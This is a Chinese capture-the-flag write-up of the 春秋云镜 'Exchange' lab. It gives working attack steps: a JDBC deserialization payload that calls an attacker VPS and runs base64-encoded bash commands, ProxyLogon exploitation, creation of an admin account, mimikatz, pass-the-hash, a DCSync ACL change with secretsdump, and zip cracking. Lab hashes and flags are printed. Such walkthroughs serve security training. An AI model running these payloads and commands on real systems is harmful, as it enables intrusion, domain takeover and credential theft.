首页 > 其他分享 >春秋云镜 Exchange

春秋云镜 Exchange

时间:2024-09-03 20:04:37浏览次数:8  
标签:春秋 Exchange 云镜 XIAORANG flag 3.2 open 172.22 3.9

使用fscan进行扫描
image

得到是一个Lumia ERP,开放了8000端口存在登录页面.
利用网上漏洞进行信息泄露得到账号密码
image

破解密码得到
image

后台登录发现没有写马的地方.
这里可以打一个JDBC(不懂java),去打cc6这条链子.
在本地去起一个恶意的Mysql服务器,配合ysoserial-all.jar去打JDBC.注意配置config.json

 python3 server.py 

然后将下面的payload进行url编码

{
	"name": {
		"@type": "java.lang.AutoCloseable",
		"@type": "com.mysql.jdbc.JDBC4Connection",
		"hostToConnectTo": "vpsIP地址",
		"portToConnectTo": 3306,
		"info": {
			"user": "yso_CommonsCollections6_bash -c {echo,base64编码后的命令}|{base64,-d}|{bash,-i}",
			"password": "pass",
			"statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
			"autoDeserialize": "true",
			"NUM_HOSTS": "1"
		}
	}

发送给/user/list路由的search参数.
image

拿到的直接就是root shell.
image

flag:flag{f081abeb-d43e-4515-9e0a-db552df35f3e}
架个代理,传个fscan扫内网.

./fscan -h 172.22.3.12/16

   ___                              _    
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.3.12     is alive
(icmp) Target 172.22.3.9      is alive
(icmp) Target 172.22.3.2      is alive
(icmp) Target 172.22.3.26     is alive
(icmp) Target 172.22.255.253  is alive
[*] LiveTop 172.22.0.0/16    段存活数量为: 5
[*] LiveTop 172.22.3.0/24    段存活数量为: 4
[*] LiveTop 172.22.255.0/24  段存活数量为: 1
[*] Icmp alive hosts len is: 5
172.22.3.26:445 open
172.22.3.2:445 open
172.22.3.9:445 open
172.22.3.9:443 open
172.22.3.2:139 open
172.22.3.9:139 open
172.22.3.26:135 open
172.22.3.2:135 open
172.22.3.9:135 open
172.22.3.9:81 open
172.22.3.9:80 open
172.22.3.26:139 open
172.22.3.2:88 open
172.22.3.9:808 open
172.22.3.9:8172 open
[*] alive ports len is: 15
start vulscan
[*] NetInfo 
[*]172.22.3.2
   [->]XIAORANG-WIN16
   [->]172.22.3.2
[*] WebTitle http://172.22.3.9         code:403 len:0      title:None
[*] NetBios 172.22.3.26     XIAORANG\XIAORANG-PC          
[*] NetInfo 
[*]172.22.3.9
   [->]XIAORANG-EXC01
   [->]172.22.3.9
[*] OsInfo 172.22.3.2   (Windows Server 2016 Datacenter 14393)
[*] NetInfo 
[*]172.22.3.26
   [->]XIAORANG-PC
   [->]172.22.3.26
[*] NetBios 172.22.3.2      [+] DC:XIAORANG-WIN16.xiaorang.lab      Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.3.9      XIAORANG-EXC01.xiaorang.lab         Windows Server 2016 Datacenter 14393
[*] WebTitle https://172.22.3.9        code:302 len:0      title:None 跳转url: https://172.22.3.9/owa/
[*] WebTitle http://172.22.3.9:81      code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0 code:200 len:28237  title:Outlook
[*] WebTitle https://172.22.3.9:8172   code:404 len:0      title:None
已完成 15/15
[*] 扫描结束,耗时: 17.908807953s

一共就是这四个机器

172.22.3.12     拿下
172.22.3.9      EXC01
172.22.3.2      DC
172.22.3.26     PC

直接访问扫出来的这个172.22.3.9链接https://172.22.3.9/owa/auth/logon.aspx?url=https%3a%2f%2f172.22.3.9%2fowa%2f&reason=0
image

是个exchange服务,直接打
使用proxylogon.py,能够直接获取system权限.注意,这B东西是python2

proxychains python2 proxylogon.py 172.22.3.9 [email protected]

添加一个叫lbz的管理员用户

net user lbzlbz lbz12345! /add
net localgroup administrators lbzlbz /add

rdp上去,得到了第二个flag
image

flag:flag{e61710bf-31c8-4d4c-80d2-1cbea9e8f2ef}
传一个mimikatz去抓本机中的密码
得到了本机机器账户NTLM:ff4a457e2649f11a975bbd0f9d36c285
Zhangtong的NTLM:22c7f81993e96ac83ac2f3f1903de8b4
我们哈希横传上去拿个交互的shell

proxychains python3 psexec.py -hashes :ff4a457e2649f11a975bbd0f9d36c285 XIAORANG/XIAORANG-EXC01\[email protected]

传个Sharphound去看看.在system shell下去执行命令.

SharpHound.exe -c all

image

发现EXC01机器账户默认对域内成员具有writeDacl权限,允许修改对象的ACL.我们给Zhangtong修改个DCSync,就可以去抓域控的哈希.
使用dacledit.py去配置.

proxychains python3 dacledit.py xiaorang.lab/XIAORANG-EXC01\$ -hashes :ff4a457e2649f11a975bbd0f9d36c285 -action write -rights DCSync -principal Zhangtong -target-dn "DC=xiaorang,DC=lab" -dc-ip 172.22.3.2

image

proxychains python3 secretsdump.py xiaorang.lab/[email protected] -hashes :22c7f81993e96ac83ac2f3f1903de8b4 -just-dc-ntlm

image

得到了Administractor的NTLM为7acbc09a6c0efd81bfa7d5a1d4238beb
使用哈希横传进行登录.

proxychains python3 psexec.py -hashes :7acbc09a6c0efd81bfa7d5a1d4238beb XIAORANG/[email protected]

得到了第四个flag
image

flag:flag{575ca996-afcd-4d3a-b586-e6b3729696d6}
还有个172.22.3.26没动过
照着网上的wp去打邮件系统

proxychains python3 pthexchange.py --target https://172.22.3.9/ --username Lumia --password '00000000000000000000000000000000:862976f8b23c13529c2fb1428e710296' --action Download

发现存在一个压缩包,里面是一个flag.docs文件,但是存在密码.
查看邮件内容发现flag就是电话号码.
image

写个python脚本来进行字符串的处理.

# 输入文件路径
input_file_path = '1.txt'
# 输出文件路径
output_file_path = 'output.txt'

# 读取文件内容并将每行存储在数组中
with open(input_file_path, 'r', encoding='utf-8') as file:
    lines = file.readlines()

# 存储匹配结果的数组
matched_strings = []

# 遍历每一行并提取最后一个逗号后面的字符串
for line in lines:
    line = line.strip()
    last_comma_index = line.rfind(',')
    if last_comma_index != -1:
        matched_strings.append(line[last_comma_index + 1:])

# 将匹配结果写入输出文件
with open(output_file_path, 'w', encoding='utf-8') as file:
    for string in matched_strings:
        file.write(string + '\n')

print("处理完成,结果已写入", output_file_path)

得到了output.txt,其中存储着用户的号码.
将压缩包的密码哈希写入文件中

zip2john item-0-secret.zip >zip.txt

使用john去破解

john --wordlist=1.txt zip.txt

得到了密码为18763918468
查看得到了flag
image

flag:flag{cf0c753c-233f-4729-8984-0746ea5878b7}

共用时3小时5分钟,其中大半卡在入口机进不去.没办法,确实缺乏java安全知识,外带工具不好用.后面的改ACL添加DCSync是从来没打过的.最后为什么去端邮件还是有点莫名所以.
image

标签:春秋,Exchange,云镜,XIAORANG,flag,3.2,open,172.22,3.9
From: https://www.cnblogs.com/meraklbz/p/18395344

相关文章

  • Exchange 2016部署实施案例篇-03.Exchange部署篇(下)
    昨天我们一起准备完成了ExchangeServer2016的先决条件,今天我们一起来看下如何部署ExchangeServer2016.最近想了想,决定该篇使用2种方式部署ExchangeServer2016,这样可能会让大家对ExchangeServer2016的部署更了解些,废话不多说,开始今天的内容。图形化界面部署......
  • Exchange 2016部署实施案例篇-03.Exchange部署篇(中)
    上一章《Exchange2016部署实施案例篇-03.Exchange部署篇(上)》我们对部署ExchangeServer2016的先决条件做了简单的讲解,接下来我们进入先决条件准备工作。先简单说下环境:服务器名称IP地址系统作用ADSrv01192.168.1.10Win2016GC(已部署完成)ADSrv02192.168.1.20......
  • 解决 Exchange 发到邮件组报错 550 5.1.1 User unknown (in reply to RCPT TO command
    版本2010只需要关闭:要求所有发件人通过身份验证位置:Exchange管理控制台收件人配置通讯组XXX组属性邮件流设置邮件传递设置[√]要求所有发件人通过身份验证取消勾选,再点确定即可参考资料:https://portal.thobson.com/knowledgebase/427/550-511-Use......
  • Exchange 2016部署实施案例篇-03.Exchange部署篇(上)
    距离上一篇《Exchange2016部署实施案例篇-02.活动目录部署篇》博文更新已经过去快一周了,最近一直在忙项目上的事情和软考,整的真心有点身心俱疲啊,最近看了下上一篇博文不知道为什么访问量一直上不去,真心有点心寒啊。希望大家能多多提出宝贵意见,看看如何能让访问量上去。......
  • Exchange 2016部署实施案例篇-02.活动目录部署篇
    其实在写这篇博文之前纠结了好久,到底是该写部署1台AD演示下,还是部署2台活动目录那,比较这个专家还是以Exchang为主,但思来想去最终决定还是部署一主一辅吧,毕竟部署主与辅助还是稍微在步骤上有些不同的,废话不多说,接下来我们开始我们今天的话题,活动目录部署,请大家耐心读奥,有福利奥......
  • Exchange 2016部署实施案例篇-01.架构设计篇(下)
    相信看过上篇Blog《Exchange2016部署实施案例篇-01.架构设计篇(上)》的老铁们可能知道,小弟在上篇Blog中编写了一个需求,不知是否有老铁们已经设计出相对于的架构了,今天我就给大家介绍下我设计的架构。  需求分析我在上篇已经做过了,欢迎各位老铁查阅上一篇博客《Exchange2016......
  • Exchange 2016部署实施案例篇-01.架构设计篇(上)
       前言:此博客为转载,最开始发布这个博客的博主已经看不到了,而网上的一般又不太全,所以我整理起来发布在这里,如果需要删除的化请私信我  年前就答应大家要给大家写一个关于Exchange规划部署的文章,一直忙到现在也没有倒出时间来写这个东西。特别是节后,更是开工不利啊,各种奇......
  • 修改Exchange用户每分钟/每天的发送邮件数量的默认值MessageRateLimit和RecipientRate
    1分钟内连续多封邮件发送失败了,导致大量邮件堵塞。经查,报有下面的错误:4214.4.2Messagesubmissionrateforthisclienthasexceededtheconfiguredlimit这是因为从Exchange2010开始,默认每分钟发送的邮件封数限制为5封,这个限制参数是:MessageRateLimit  微软官网有给出此......
  • 春秋云镜CVE-2022-28512
    目录1:开启靶机访问2:根据提示确定目标点3:访问该路径/single.php,并且id传参发现单引号闭合4:访问该路径/single.php,并且id传参,发现十个字段1:开启靶机访问2:根据提示确定目标点3:访问该路径/single.php,并且id传参发现单引号闭合4:访问该路径/single.php,并且id传参,发现九......
  • 春秋云镜CVE-2022-29464 (WSO2文件上传漏洞)
    目录一:访问靶机:2:根据提示知道可以文件上传3:两个方法一:访问靶机:2:根据提示知道可以文件上传3:我们两个方法1:使用EXPimportrequestsimporturllib3urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)url=input("请输入URL:")file="shell.jsp"pa......